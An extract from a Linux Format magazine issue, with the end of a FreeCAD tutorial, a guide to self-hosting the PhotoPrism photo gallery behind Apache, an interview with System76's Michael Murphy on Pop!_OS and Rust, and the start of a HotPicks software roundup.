sketch and of the top edge from this sketch. Use the
Constrain Vertical Distance tool and specify a distance
of 3mm. Repeat this so that the bottom wall is also
3mm, and then constrain the side walls using the
Constrain Horizontal Distance tool, also by 3mm.
Consider adding holes to the box. Select a side panel, create a new
sketch and use the Pocket feature again.
GET LXF IN 3D OBJECT FORM…Subscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
CAD basics TUTORIALS
Once the inner cavity is fully constrained, click OK to Here’s the finished
box, complete with
return to the main part design workbench screen. You rounded corners,
should see an inner box attached to the top face of hollowed interior
the model. Making sure that the second sketch and pillars in
(probably called sketch001) is selected in the Model the corners.
tab in the sidebar, click the Pocket icon in the toolbar.
Immediately, this should make the second sketch cut
into the model. By default, the depth of the pocket is
usually 10mm, which isn’t deep enough for our purpose,
so change it to 27mm. This means that the bottom wall
of the box has the same thickness as the side walls.
FreeCAD has a
CAD you go further? habit of popping
FreeCAD is a huge piece of software, and we’ve only up terrifying-
scratched the surface of what it can do, even in terms looking errors in
of the Sketch editor. At this point, you should have a the log window
good idea of what it takes to make a simple 3D part at the bottom
in FreeCAD. of the screen.
Most of the
As an exercise, you might want to add some holes to
time, you’ve
the side of the object for connectors and ports. To do
just clicked the
this, select the side face of the model and add a sketch wrong thing
to it. You then add some shapes for the holes, constrain somewhere.
them, and then use the pocket tool so that they cut
through the wall and into the interior. You could also add
a lid to the box. In this case, we’ve created an object out
of thin air, but you could have used a tape measure to
copy the dimensions from an existing object.
Happy sketching and designing in FreeCAD.
We exported the model as an STL file and imported it into Blender to render it
July 2022 LXF290 75
TUTORIALS LXF Server

PHOTOPRISM
Credit: https://photoprism.app

Set up picture-perfect
online photo storage
In a flurry of paranoia, David Rutland expels Google Photos from his life and
sets up self-hosted photo storage on the semi-official Linux Format VPS.

hotography was a viable career path once upon

P a time. As a hobby, it was expensive, with steep

outlays for even basic point-and-click compact
cameras. A roll of decent quality 35mm film would set
you back £4 in 1990 (equivalent to about a tenner in
OUR 2022 money), and you could add an extra £3.50 to get
the film developed so you could actually see them in
EXPERT glorious 6x4 format. Professionals who chose to pour
David Rutland their creative juice into the field spent even more.
takes pains to Then there were the years of training to learn about
always look cool light levels, exposures and framing. And a high-end
and mysterious in single lens reflex camera in the late 80s could easily
photographs and cost as much as a two-bedroom terrace in Liverpool.
often wears a hat. But the extraordinary outlay would be made back
He’s naturally with work in newspapers and magazines, at weddings,
photogenic and photoshoots, and fancy formal portrait sessions. The PhotoPrism docker-compose file enables you to change
challenges you to These days, the outlay is effectively zero. Almost everything from site caption to NSFW filters.
find a bad picture everyone in the UK already has a phone with an inbuilt
of him anywhere. camera somewhere within three feet of them at all If only there was a way to back up, store and view your
times (where are all the UFO photos?–ED). You don’t images without being vulnerable to the depredations of
need to buy film or pay for developing, and the multi- a data-slurping tech giant…
lens monstrosities churned out by Apple, Samsung, and The self-hosted photo gallery scene is thriving, with
Huawei produce arguably better pictures than even the both individual hobbyists and professional teams vying
best professional equipment from previous decades. to get their software on to your VPS. These include
Even storage is free. Instead of bursting the seams of PiGallery (which works on everything Linux – not just
a heavy oak steamer trunk in the attic, your photos are Raspberry Pis), and the various tiers and licences of
sorted, tagged and uploaded to the cloud – safe and Chevreto, and Lychee, which in our view is more suitable
accessible on Apple or Google servers. to professional photographers. And then there’s
Synology Moments, a superbly professional piece of
If your Are your photos in safe hands? proprietary software designed to run on Synology’s own
photographic
However, trusting your photos to companies who watch NAS hardware.
subjects don’t
everything you do and say, both online and in the real We wanted our solution to be as much like Google
like the idea
of their faces world, is unnerving – and perhaps a little naive. Can Photos as possible, for the simple reason that Google
being scanned you be sure that no-one at Google HQ is ogling the Photos is the absolute bees’ knees in terms of usability
categorised lascivious images of your significant that you took last and intuitive interface. There’s a reason that Google is
and stored in night over dinner, or checking out your beach-ready, the fourth most valuable company on earth – and it’s
your private speedo-clad dad-bod on Brighton beach. Of course you because it makes kick-ass, easy-to-use products.
database, you can’t. At the very least, it’s prudent to be worried about We also wanted something that was in active
can disable offending the Google automatic censors. development, with a regular update and release
TensorFlow And your photos exist at the discretion of whoever schedule, and that has a roadmap for the future. Not a
functions or
holds them. You may think that Google will keep your piece of software that started off as a great idea, and
just facial
precious snapshots safe forever, but it won’t. If you’re then fell by the wayside as dev teams became distracted
recognition in
the docker- inactive for two years, Google will straight up delete your by other projects, fast cars or the lure of filthy lucre.
compose.yml photos. If you go over the storage limits of your account, In the end we decided on PhotoPrism. Although still
Google will delete some to make space. It’s not perfect. not an entirely finished product, it’s extremely usable,

76 LXF290 July 2022 www.linuxformat.com

 LXF Server TUTORIALS

and head and shoulders above the competition.

PhotoPrism has been in development for several years,
and new releases are pushed out with a regularity that a
gastro-intestinal consultant would envy. New features
invariably improve the product, and compatibility is
taken care of out-of the box, because PhotoPrism
supports most popular image, video and RAW formats,
including JPEG, PNG, GIF, BMP, HEIF, HEIC, MP4, MOV,
WebP (Effy’s nemesis–ED) and WebM.

Docking around
As usual the first thing you need to do is pick out a
domain name for your photo stash. As we’re all about
imagination (and don’t want to shell out an addition
fiver), we created a subdomain at photos.lxf.guru.
Point the DNS A record at the IP address of your VPS
and visit https://dnschecker.org. Type the domain name
in the search box, and select ‘A record.’ When the map
shows a majority of green ticks, log into your VPS with
$ ssh user@your-vps-ip
Make sure the system is up to date with sudo apt
update and sudo apt upgrade .
If you’ve been following this tutorial series from the
beginning, then you’ll already have everything you need
to get PhotoPrism up and running. If not, refer to the
tutorial in LXF282, and then come back.
All done? Great.
The PhotoPrism developers recommend using
docker-compose to set up and manage their software,
and who are we to argue?
From your home directory, type:
$ wget https://dl.photoprism.app/docker/docker-
compose.yml
You’ll want to edit the file to make it work on your
system, so run:
$ nano docker-compose.yml
to open it up for editing.
The first thing you’ll notice is that PhotoPrism’s
docker-compose file is an absolute monster. It runs to
146 lines in total, and enables you to configure virtually
everything. You can explore most of these options later.
For now, head down to the Storage section of the file.
You’ll see that PhotoPrism has assigned a number of
directories to itself. By default, it’ll store original photos
in your Pictures directory. If you plan on using the
Pictures directory for other purposes, change this line:
- “ ~/Pictures:/photoprism/originals ” Face recognition
to the directory you want you want PhotoPrism to use is powered by
TensorFlow and
instead. for example: is very good at
- “ ~/my-photo-stash:/photoprism/originals ” its job. There are
Still in this section, you will want to uncomment the 431 pictures of
following line: the author and he
looks fabulous in
- “ ~/Import:/photoprism/import”
every single one.
This means that you’ll be able to create a directory
called import in your home directory, and PhotoPrism
will, unsurprisingly perhaps, import any photos it finds
in there. If you’ve just downloaded multiple gigabytes of
archives from your Google Photos account, this is where
you’ll want to put them.
In the environment section, change the Admin
password from the default insecure password. It’s
probably a good idea to change the database password
while you’re at it.
Other highlights of environment include the site URL,
the site title the site caption, and the site description.
We set the URL to photos.lxf.guru; the site title to The
Unofficial Linux Format Photo Archive, the caption to
Where all our Linux Photos Live, and we left the site
description blank, because frankly, we were running out
of ways to say the same thing.
Finally, move down to the database section of the file
and replace the passwords with the ones that you
changed earlier.
At the top of the file, there is a handy list of
commands to administer your PhotoPrism instance
while it’s running. However, because many of these are
available through the web interface, we’re not going to
bother with them right now. You’ll also find an
exhaustive range of options – from database type to

TAKE BACK CONTROL

The odds are good that most of your
pictures are taken on an iPhone or
Android device and automatically synced
to your Apple or Google account. It’s
something you barely need to set up
when you purchase a new handset –
the OS makers make sure that it’s as
easy as possible. Fortunately, they also
make it fairly easy to pull your photos
out of the cloud as well.
If Google is your current cloud of
choice, then visit https://takeout.google.
com to view the shockingly long list of
Google products you’ve used that are
storing your data. Click the deselect all
checkbox (unless you genuinely want to
download everything you’ve ever put into
Google). Scroll down until you reach
Google Photos and then put a check in
the checkbox.
At the bottom of the page, you’ll see a
Next Step button, Click it and select
Export Once. After a day or two, Google
will send you a link to a zip file that
contains your photos. Note: archives will
be split into 2GB chunks and depending
on how avid a photographer you are,
there may be quite a few of them.
Apple, as usual, makes things a little
more difficult and to download all your
photos from iCloud. Windows and Mac
users can manage it easily enough with
the iCloud desktop application. However,
there isn’t an official version for Linux. If
you don’t want to mess around with VMs
or Wine, visit www.icloud.com then go to
your photo library. Select the first photo,
then scroll down to the bottom of the
screen and select the last photo while
holding down Shift. Click the download
button. Now delete your Apple and
Google accounts with no regrets!

www.techradar.com/pro/linux July 2022 LXF290 77

TUTORIALS LXF Server
disabling object recognition. These are well commented,
so feel free to play around. If you break something, you
can always re-download the file.
Save the file with Ctrl+o and exit with Ctrl+x running:
$ docker-compose up-d
will cause your VPS to pull images for PhotoPrism and
MariaDB and set up containers. These are large files and
may take a while. Once the process has completed and
you’re returned to the command line, run:
$ docker-compose ps
to check that PhotoPrism is actually running.
Docker has an alarming habit of downloading more
images than just the one you need, and these may be
taking up valuable space on your VPS. Banish them to
the nether with:
$ docker image prune -a
to reclaim your disk space.
Now you need to tell Apache how to deal with
Photoprism pulls incoming requests, so type:
GPS coordinates $ cd /etc/apache2/sites-available/
from you photo and then:
metadata, making
$ sudo nano photos.conf to create a new Apache
it easy to view
pictures on a map configuration file.
of the world. Type in:
PHOTOPRISM’S SHORTCOMINGS
PhotoPrism’s biggest letdown is its mobile app – it doesn’t have one.
Or it does, but the mobile app isn’t compatible with the current server
software, and as far as we can tell, it has been abandoned.
There are several workarounds available. If you already have a
Nextcloud instance, but are looking at PhotoPrism as an alternative to
Nextcloud’s incomplete and rather dreadful gallery, then you probably
already have the Nextcloud mobile client installed and uploading
images to your home server.
If this is the case, you can easily tell PhotoPrism to synchronise
with the photos on your NextCloud server. Click the cog icon, then
select the sync tab. Click on Add Server then fill in the details. You
can choose to have PhotoPrism check your NextCloud photo storage
at intervals varying between every hour and every fortnight.
Another method – for people who don’t have already have piles
of server hardware cluttering up their living rooms – is to use
PhotoSync, an app available for Android and iOS.
Once you’ve installed the PhotoSync app (in the usual way), click
the cog icon, then on configure and select PhotoPrism, then enter
your server settings. Make sure that you choose Autotransfer so that
photos are uploaded automagically as soon as they’re taken.
78 LXF290 July 2022
Image classification can be a little patchy. Note the dog which is also a
lizard, the cat which may be a monkey, and this writer’s ‘limousine’.
<VirtualHost *:80>
ServerName your-domain-name.tld
ProxyPass /api/v1/ws ws://your-vps-ip-address:2342/
api/v1/ws
ProxyPassReverse /api/v1/ws ws://your-vps-ip-
address:2342/api/v1/ws
ProxyPass / http://your-vps-ip-address:2342/
ProxyPassReverse / http://your-vps-ip-address:2342/
ProxyRequests off
</VirtualHost>
Save the file with Ctrl+o, then exit with Ctrl+x.
Activate the conf with sudo a2ensite photoprism.
conf , then restart Apache with:
$ sudo service apache2 restart.
Secure your snaps
Finally, you’ll likely want to secure your site with TLS.
You should already have certbot installed on your VPS.
This tool allows you to obtain and install a security
certificate from Lets Encrypt.
$ sudo certbot
will bring up a list of sites for which a certificate can be
fetched. Choose the number corresponding to your
PhotoPrism site, then press 2 to ensure that http
requests are redirected to https.
The hard work is now done (it wasn’t that hard, was
it?), and you should be able visit your site and log in with
the username admin, and the password you set using
docker-compose. If you want to have a look at the LXF
demo instance at photos.lxf.guru, the password is ‘linux’.
Once you log in to your PhotoPrism instance, you’ll
notice that there’s nothing there. You haven’t added any
photos yet. The easiest way of populating the screen is
to transfer a zipped archive of images to the Import
folder on your VPS.
$ scp ~/your-photo-archive.zip user@your-vps-ip-
address:/home/user/Import/
Then, from your VPS, extract with:
$ unzip Import/your-photo-archive.zip -d Import/
Remove the zip file with:
$ rm Import/your-photo-archive.zip
Next, tell PhotoPrism to import and index your photo
archive with the following:
$ docker-compose exec photoprism photoprism import
Visit the web interface at this point, and you should
see your photos start to appear, with tags being
automatically assigned, EXIF data extracted, and
thumbnails generated. Beware though: with an archive
comprising tens of thousands of photographs, this
process can take several days. For our sample set of
72 images, importing and indexing took nine minutes.
www.linuxformat.com

If you already have a Nextcloud instance, it’s simple to synchronise you
photo folders with PhotoPrism.
Indexing also uses a lot of memory, so if you opted for a
low-end VPS, make sure that you have a swap file of at
least 4GB.
By default, photos are arranged in a large grid (most
recent first) with details such as location, date, file size,
camera model and resolution displayed underneath.
By repeatedly pressing the second icon from the right
(located on the top bar), you can change the layout to
use smaller icons or even a list view.
Photo features
PhotoPrism’s standout feature is the way it enables you
to automatically organise your images according to
subject, location, date and the people in them. After all,
finding one photo among thousands is a difficult task.
Remember that gorgeous canalside photo you think
you shot from a pub beer garden, somewhere in the
wilds of Cheshire about three years ago? Of course you
do, but you can’t find it because you can’t remember
the exact date. Here’s where PhotoPrism can help you in
several ways.
Open the map view by clicking the eighth icon down
on the left menu bar, and you’ll be shown a map of the
world showing clusters where photos were taken. Zoom
in using the scroll wheel and the large clusters will
differentiate – becoming smaller and more spread out.
Simply zoom in on Cheshire, locate the canals, and scan
along the length until you find the pub. There’s your
picture right there.
Alternatively, you might remember that what camera
you used to shoot the photo, or that the sky was
predominantly orange, it was taken in April (although
you still can’t remember the year) and that it was taken
outdoors. Using the search drop-down, you can easily
filter and narrow down the search until you find the
picture you’re looking for.
Go with the TensorFlow
Notwithstanding this author’s view that Google is an
irredeemably evil company, it does create outrageously
good software, and a fair portion of it is both open-
source and incredibly useful. One of these pieces of
software is TensorFlow, a software library for machine
learning and artificial intelligence. The developers of
PhotoPrism have incorporated it in their own software.
CREATE YOUR OWN LXF LIBRARYSubscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
LXF Server TUTORIALS
This means that as photos are being indexed,
PhotoPrism will try and work out what’s in them and
assign them to categories. This isn’t always perfect, If you’re already
and mistakes are made. We found that goats and horses using a docker-
are often categorised as dogs, dogs are occasionally compose to
thought to be lizards, cats masquerade as monkeys, run a service,
and this author’s battered old 4x4 was mistaken for a append the
contents of the
limousine. But despite the TensorFlow shortcomings,
PhotoPrism
it’s still quite effective at helping you to find what you’re
docker-compose
looking for. file to your
Where TensorFlow really stands out is facial existing one.
recognition – which is not at all surprising if we’re
honest. Click the icon of a person on the left-hand bar
and you’ll be told that there were no people found.
PhotoPrism will have detected faces, though – it just
needs you to tell it who they belong to. Click the Show
New Faces option, then type in a name. That person is
now tagged and can be selected from a drop-down list
when tagging in future. When you start tagging people,
most of the work is manual, but the more it’s used, the
more it improves. Eventually – usually within a few
weeks of manual tagging – PhotoPrism will reliably and
accurately recognise your friends and relations, sorting
them into folders for your perusal and pleasure.
This writer has been using PhotoPrism for around 18
months and has found that it can faithfully differentiate
between two identical twins of his acquaintance.
Out of the cloud
In our opinion, PhotoPrism is the absolute best self-
hosted photo manager out there, but that doesn’t mean
it’s perfect. Object recognition is patchy, and there are
quirks, such as the site complaining that it has lost
connection even when it hasn’t.
Another feature that’s lacking is multi-user support.
Only one account is supported, and that’s the admin
account. This is great if you’re running PhotoPrism as a
family photo dump, but for it to support multiple users,
you would need to run multiple instances on different
ports, using different subdomains. It’s not ideal.
You’ll have surmised, then, that PhotoPrism is a work-
in-progress and is being constantly developed by a team
of three. It looks and performs great now, and when it’s
finally completed at some indefinite point in the future,
it will be amazing.
Currently, PhotoPrism only supports one user - admin. This will change in the future, but for
now, this is all you get.
July 2022 LXF290 79
 TOP
IN-DEPTH Top of the Pop!_OS

OF THE
POP!_OS
System76 developer Michael Murphy shares his Pop!_OS insights with
Linux Format’s self-proclaimed top Pop fan Jonni Bidwell.

eaders in the US who are on We hit up System76 software engineer these have since vanished. It’s a different

R the lookout for a Linux

machine could do a lot worse
than hit up Denver-based
System76 and grab one of its fine
desktops or laptops. Nope, this isn’t an
advertorial, this is just fact. We’ve been
impressed by System76’s efforts ever
since it launched its first machines in the
mid-naughties. We’d recommend them
to UK readers too, but transatlantic
shipping is a little pricey. Oh, and the
reference to the 1776
and Pop!_OS maintainer Michael Murphy
to discuss the latest Pop release, a bug
that hit the social media big time and the
challenges faced by Gnome-based distros
that don’t want to look like Gnome. And
not content with all that activity, System76
is big into the Rust programming language.
So much that the company is making a
new Rust-powered desktop. We’re sure you
want to hear about it just as much as we
do. So read on...
story today, where the likes of Dell and
Lenovo will happily sell you a laptop
running Linux rather than Windows. We
also have speciality manufacturers such as
Purism and Pine, which both make Linux
laptops and phones. And it would be
remiss not to mention UK-based
Entroware. But consider System76, which
set up shop in Denver, Colorado back in
2005, and has been making finely crafted
Linux machines ever since.
Hoping to cause an

RUST’S APPEAL IN A NUTSHELL

American Revolution open source revolution
twinges our government- (and independence from

“After spending some time with the

mandated nationalistic proprietary software), the
sensitivities a tad, too. first machines shipped

alpha, it was clear to me that Rust was

Be that as it may, were desktops running
System76 has also been Ubuntu 5.10 Breezy

the future of software development.”

shipping its own Linux
distribution since 2017. And
it’s not just for its hardware
too – it works great on other PCs. Far from
being just another Ubuntu spin, Pop!_OS
runs a different bootloader, uses its own
shell (dubbed COSMIC, for Computer
Operating System Main Interface
Components), and even has its own power
scheduler. Which makes it ideal for laptops.
Linux servers have been widely
available for almost as long as there has
been Linux. But for a long time it was
remarkably difficult to buy a desktop PC
with Linux pre-installed, never mind a
laptop. A few smaller vendors popped up
at the turn of the millennium, but most of
Badger. Skip on a few
years and the company
now has a couple of
dozen employees, does its manufacturing
in-house, open sources its hardware
designs, and makes its own OS as well.
Pop!_OS, despite the slightly awkward
punctuation, has enjoyed a huge amount
of popularity thanks to being available to
everyone, not just owners of System76 kit.

80 LXF290 July 2022 www.linuxformat.com


Michael Murphy manages to spend time – at least an hour or two –
outdoors in between his Rust projects and Pop!_OS work.
We talked to Michael – Pop developer, Rust
aficionado and community man (@mmstick on Pop’s
social media) – to find out more about the OS with
onomatopoeia. His Linux journey began back in 2008.
“Linux was a miserable desktop experience back then
for anyone with a PC that happened to have AMD
graphics,” said Michael. “Despite all of the issues that
I had with applications consistently crashing, kernel
regressions and hardware which was poorly supported,
I believed that there was a lot of potential in the open
source movement. Linux desktops would, some day, be
a viable replacement for Windows once hardware
manufacturers start supporting it”.
Oh gosh, we remember the proprietary Fglrx driver.
Fortunately those days are gone. As are Michael’s
college days. Realising a traditional IT path would have
led him down the dark roads of C#, .NET and Java, he
opted out after two years and chose Linux instead.
“Linux was a much better environment to work in,
in that had some sense of purpose in life behind it,” said
Michael. A few years later, and he had found his calling.
“By 2015 I had experimented with a lot of different
programming languages, and Rust was nearing release.
After spending some time with the alpha, it was clear to
me that it was the future of software development. The
Rust ecosystem was developing rapidly, GTK bindings
were increasingly functional, and I joined Redox OS to
experiment with designing a system shell while making
GTK applications on the side.”
Speedy Rust projects
Rust is becoming extremely popular. The number of
projects described as “a lightning fast {} programmed in
Rust” on GitHub is getting ridiculous (Alacritty, Joshuto,
Lapce). We had the pleasure of meeting Rust champion
(and open source titan) Jim Blandy at OSCON back in
2015 (see LXF209). He told us that after decades of
people using C and C++ and overflowing buffers, “the
jury is in, the experiment has run, humans can’t write
that code, they can’t be trusted”. So we know that after
so many decades of trying to write memory-safe code,
we need a new approach. And that approach is through
new languages like Rust, Swift and Go.
Redox OS (www.redox-os.org) is Pop founder Jeremy
Soller’s microkernel-based, Unix-like OS that’s written in
www.techradar.com/pro/linux
Top of the Pop!_OS IN-DEPTH
Rust. And it was through his Redox OS work that
Michael joined the System76 team in 2018. “My initial
task was a collaborative development with elementary
OS to develop a Linux distribution installer backend in
Rust with a GUI frontend in Vala. Since then, I’ve worked
on a variety of Pop projects, and have tried to maintain
an active presence supporting the Pop community on
Reddit and Mattermost.”
So there’s a connection to one of our other favourite
Ubuntu-based distros: “Cassidy [James-Blaede] was
doing UX work for Pop before he joined elementary OS
full time. He designed the earlier GTK projects in Pop
and it’s the reason why the Pop Shop and installer are
forks of the elementary AppCenter and installer.
However, elementary has always leaned in heavily on
Vala as its favourite programming language, and we
prefer Rust.” The current Pop desktop is called COSMIC,
but it’s a not very well-kept secret that System76 is
working on its own Rust-powered desktop environment
of the same name.
A COSMIC undertaking
We asked Michael how COSMIC fits in with its Gnome
underpinnings. “The existing COSMIC desktop is purely
written in JavaScript as a series of ‘monkey patches’ to
a GNOME Shell JavaScript process, which binds directly
to a C process with access to C libraries. There’s much
to dislike about the current state of the implementation,
from instability, performance issues, and most certainly
a lot of undiscovered security vulnerabilities.
“As I was developing pop-shell, there were a lot of
restrictions that I couldn’t work around, and many bugs
that remain unresolved. For instance, I can’t shrink a
window below its minimum width and height to fit into a
tile. Any attempt to work around that caused the shell to
crash from memory safety errors.”
As to why System76 was such a big fan of Rust
Michael said, “There are many reasons to like Rust, and
many to dislike C and C++. C is now 50 years old as a
programming language, and C++ inherits a lot of the
flaws while adding on additional flaws. Both were
designed before the internet was a concept. There’s
decades of programming language theory research
that’s completely absent from these designs, and even
Pop!_OS has a much nicer installer compared to, say, Ubuntu, and it comes complete with a
refresh/repair option for when things go wrong.
July 2022 LXF290 81
IN-DEPTH Top of the Pop!_OS

a lot of research that was ignored by C at the time it
was designed.
“Both of these languages peaked a long time ago.
It’s reckless to continue developing new projects with
them. There’s an absurd amount of money that’s been
invested into trying to work around some of these
design flaws in compilers, and no matter how much
research goes into these efforts the end result isn’t good
enough. There’s perhaps an even greater amount of
money lost trying to resolve common bugs and
vulnerabilities caused by its use. We need to be more
honest about its usage and consequences. Even
Microsoft acknowledged that 70 per cent of its
vulnerabilities are caused by it.
“Many people might answer that memory safety is
the main reason to use Rust, but it’s a side-effect of
three features in Rust that are beneficial in more ways
than memory safety alone. These features are the
aliasing XOR mutability rule, the ownership model, and
type markers.” Okay Michael, you might need to explain
these for us. Use the box (below) for your answers.
System76 makes
beautiful Linux PCs, such
as the Thelio Mira pictured
here with its Launch keyboard.
Pop was launched in 2017, when Ubuntu abandoned
its Unity desktop in favour of Gnome. Its own website
(https://pop.system76.com) describes Pop as “an
operating system for STEM and creative professionals
who use their computer as a tool to discover and
create”. And we don’t dispute it. Since its inauguration
it’s gone from strength to strength, introducing a new
tiling window mode, a helper for managing TensorFlow
installations, a bespoke power scheduler and more.
Linus Tech Tips and Pop!_OS
Yet Pop has also made headlines for somewhat less-
fortuitous reasons. Back in September, famed Youtube
channel Linus Tech Tips (LTT) took on a challenge to
use Linux as a daily driver. The result didn’t exactly
reflect glowingly on Pop!_OS, because Linus (not Linus
Torvalds) at one point tried to install Steam, and due to
a bug was met with Apt wanting to remove a whole
bunch of important system packages. Apt had the sense
to realise this may be unwanted, but its defence at the
time was to issue a prompt requiring the user to enter
the phrase “Yes, do as I say!”. Duly, Linus did as the
prompt said, and duly his system was hosed.
Michael explained how things went south. “The issue
happened because of a Systemd update pushed to
Launchpad that had only built and published the amd64
packages. Steam depends on the i386 libraries from
Systemd, so it wasn’t possible to install. At the time, we
depended on Launchpad for our system repository, but
Launchpad recently started blocking i386 builds of
packages unless the packages were on an allowlist. Up
until that point, Systemd packages we published were
on that allowlist, but we backported a newer version of
Systemd whose version wasn’t permitted.
“We noticed the issue immediately after and had it
fixed within an hour. What we didn’t know was that LTT
was livestreaming installing it at this moment. Rumours
started spreading about a Pop incident because the
livestream was private and would be public in a week.
Once it had gone public there was a never-ending
stream of accusations and demands for us to fix this

THE RUSTY TRINITY

Okay Michael, tell us about Aliasing
XOR mutability, ownership models, and
er, that other thing you said. “Aliasing
XOR mutability means that a value may
either be lent with multiple read-only
references, or lent with a single mutable
reference,” explains Michael. “It also
means that you can’t pass ownership
of a value while it’s being actively
referenced. This is technically a best
practice to follow regardless of what
programming language that you use, but
it wasn’t possible to verify at compile
time until Rust.
“The ownership model in Rust simply
declares that any variable passed by
value into a function is transferring
ownership of the value to that function.
This means that you can’t use a variable
again after it’s been passed into a
function. This is very useful for API
authors because they can ensure that
a value that should be used once is
consumed on use. Type markers are
another interesting compile-time
mechanism to prevent misuse of values
in APIs. The compiler uses these to
prevent misuse of values being moved or
shared across threads. This makes
developing multi-threaded applications
much easier.
“The thing that I particularly like about
these features is that they’re what
makes the self-documenting nature of
Rust code possible. You’ll always know
when a function is expected to modify
a reference, and ownership transfers
make it possible to have compile-time
state machines and one-use tokens.
They also raise the minimum bar of code
quality so that these best practices are
adhered by all Rust code. And they make
some interesting mechanisms possible,
such as compile-time reference counters
and the GhostCell research paper (see
https://plv.mpi-sws.org/rustbelt/
ghostcell/paper.pdf)”.

82 LXF290 July 2022 www.linuxformat.com


issue (which had already long been fixed by this point),
wanting to know why it happened.
“I’m not sure why Apt resolved the missing package
conflict in that way. It may have been trying to
downgrade to the Ubuntu version of Systemd and
reasoned that pop-desktop needed to be removed with
it, which would mark all of the base dependencies as
orphans for removal. Yet to be fair to Apt, pop-desktop is
marked as an essential package, so it did warn that the
process would remove such packages and was
dangerous. The Pop Shop doesn’t permit that kind of
operation from proceeding, instead giving an error. So it
was only possible to enter ‘Yes, do as I say!’ from the
terminal. For everyone else, the only intervention
necessary was to wait for the next Apt update to have
an updated package list with the missing packages in it.”
Assurances on Pop!_OS’s quality
We asked Michael if QA processes had changed as a
result of this fracas, and they have. Pop!_OS doesn’t rely
on Launchpad and PPAs at all now: “This accelerated our
desire to migrate away from Launchpad and host from
the same repositories that QA uses for testing everything
internally. The QA team has always been improving its
exhaustive QA process.
“Developments are an iterative process. Past bad
experiences become test cases for future developments.
The QA team added more items to their checklists, and
continued working on an automated testing system.
Steam is installed regularly on an automated system.
Steam is also now part of the Systemd update checklist.
Most of us have Steam installed on our systems, either
because we play games ourselves or just want to be
another point safeguarding it. So there’s really no need
to be causing concern for Steam.
“Launchpad is a shared hosting service with shared
build servers that aren’t equipped with Threadrippers.
On the one hand the bandwidth from the service was
free, but on the other it had many restrictions on how we
can package our software, how quickly we can release
updates, and the i386 issue was a serious conflict for us.
Given that we already had a packaging CI internally,
migrating to that solution was always a long-term goal.
“There is no PPA anymore in Pop besides the 18.04
and 20.04 releases. We’ll likely replace the 18.04 and
20.04 PPAs with apt.pop-os.org after the 22.04 release
to bring everything together into one roof. I’d also add
that the Flatpak version of Steam is available to install
out of the box on Pop. I’d like to see everyone switch to
using this long term because it has the highest level of
compatibility regardless of the version of Linux that
you’re using. Many games on Steam rely on linking to
Pop has window tiling, PipeWire and perhaps the prettiest backgrounds.
www.techradar.com/pro/linux
Top of the Pop!_OS IN-DEPTH
Look at these fine backgrounds, and yes we did notice the similarities between Pop!_Shop and
elementary OS’s app store. Nothing escapes our attention on Linux Format. (But deadlines?–ED)
shared system libraries at runtime, but these games
aren’t always compatible with the versions in the
repository. CSGO has been a source of many
complaints because it depends on an older version of a
system library no longer offered in Ubuntu beyond
20.04. Keeping Steam isolated in a sandbox will allow
you to keep a lean system installation without the need
for 32-bit packages, and system refreshes will retain the
Steam installation without needing to be reinstalled.
It’s not easy being a maverick OS, and Pop has
encountered more than its fair share of friction. Latterly,
this has been around the theming of GTK apps and
libadwaita, but “not working with upstream” has been a
common accusation directed at anyone doing things
differently in the Linux community. Michael elaborated:
“The single greatest community interaction issue for
MICHAEL VS THE GATEKEEPERS
“There’s this belief that only a certain
few are permitted to exist, that all who
come after owe their existence to them.”
everyone who develops software for Linux is
gatekeeping by Linux users, further compounded by
mob mentality. Any progress made by someone other
than the established few is automatically assumed to be
an attack against their favourite desktop or distribution.
“Every modification made to Pop is seen as not
contributing to Ubuntu. Every modification to GNOME
is seen as not contributing to GNOME. COSMIC is
considered an attack against Linux desktop adoption.
There’s this strong belief that only a certain few are
permitted to exist, that all who come after owe their
existence to them, and must write software exclusively
for them. Contributing to something that already exists
isn’t always the easiest or best option.
“There are always going to be differing opinions
on UX and implementation details, and sometimes a
project that’s already well established is unable to adapt
to new changes as a new design could. Often it’s easier
and quicker to develop something new from scratch
than to inherit an older codebase written by someone
else in a 50-year-old programming language.”
July 2022 LXF290 83
The home of technology

techradar.com
THE BEST NEW OPEN SOURCE SOFTWARE ON THE PLANET

HotPicks
CherryTree Sherlock Simple Keylogger Siren
MediaInfo Mechvibes yt-dlp Eternal Lands
Mayank Sharma
After slaving, er, scribbling
for Linux Format for over a
decade, Mayank Sharma
likes to think of himself as
LXF’s man Friday.
Speed Dreams Snap Backup ugrep

NOTE-TAKING TOOL

CherryTree
Version: 0.99.47
Web: www.giuspen.com/cherrytree

ote-taking programs are usually just electronic

N versions of Post-it notes, or simple notebooks.

CherryTree is different because it’s a CherryTree is fairly intuitive to use, but comes with a detailed multilingual user manual.
hierarchical note-taking application. The hierarchical
method of note taking not only helps you scribble down The latest release is a minor version that adds
notes in a legible, clear and simple manner, but also support for latex maths equations, as well as several
shows the hierarchies of certain tasks in an easy-to- other features for advanced users, particularly
understand manner. developers. CherryTree is available as a Flatpak, and
In the hierarchical note-taking method, ideas are also offers precompiled binaries for Ubuntu via a PPA
divided into subgroups. This works well when breaking and for Fedora via COPR.
down lengthy meeting notes, or grouping separate ones
based on their content or agendas. NOTE-TAKING WITH CHERRYTREE
CherryTree treats everything as a node, and each
node can have child nodes, enabling you to easily
organise your information. Child nodes can have their 1
own children with independent properties.
CherryTree is chock-full of features. Its notes can be
either plain text or rich text, with their own foreground
and background colours, or make use of its automatic
syntax highlighting for a variety of common
programming and markup languages.
The nifty little program also offers a spell check,
with the help of gspell, and can edit (resize, rotate) 3
and embed images along with the text as well. You 4
can create multi-level lists such as bulleted, numbered,
to-do and switch between them with ease. Even more
2
impressively, CherryTree can also handle simple tables,
that you can either import or export as .csv files. The
application can generate a table of contents using the
notes’ hierarchy, and also makes it possible for you to Menu Bar Note editor
password-protect your notes. 1 Despite being a note-taking program, 3 This is where you type the actual content
The good thing about CherryTree is that it can be CherryTree’s menu can rival those of full- of the note.
used to share information with other members of the fledged text editors.
Rich text
team. CherryTree can detect when the file has been
Tree View 4 The note can contain hyperlinks, images,
changed on disk and reload the content, but it’s not 2 This is where CherryTree displays a as well as bulleted text and more.
designed for concurrent use, and it isn’t advisable to document’s hierarchical structure of nodes.
